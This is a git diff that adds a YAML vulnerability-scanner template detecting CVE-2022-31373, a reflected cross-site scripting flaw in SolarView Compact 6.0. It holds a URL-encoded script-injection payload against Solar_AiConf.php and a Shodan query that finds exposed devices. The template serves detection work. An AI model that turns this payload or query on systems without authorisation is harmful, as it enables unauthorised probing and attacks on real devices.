diff --git a/cves/2022/CVE-2022-31373.yaml b/cves/2022/CVE-2022-31373.yaml new file mode 100644 index 0000000000..64852c2937 --- /dev/null +++ b/cves/2022/CVE-2022-31373.yaml @@ -0,0 +1,35 @@ +id: CVE-2022-31373 + +info: + name: SolarView Compact 6.00 - Cross-Site Scripting(XSS) + author: ritikchaddha + severity: medium + description: | + SolarView Compact v6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component Solar_AiConf.php. + reference: + - https://github.com/badboycxcc/SolarView_Compact_6.0_xss + - https://nvd.nist.gov/vuln/detail/CVE-2022-31373 + metadata: + verified: true + shodan-query: http.html:"SolarView Compact" + tags: cve,cve2022,xss,solarview + +requests: + - method: GET + path: + - '{{BaseURL}}/Solar_AiConf.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - '/Solar_AiConf.php/">' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200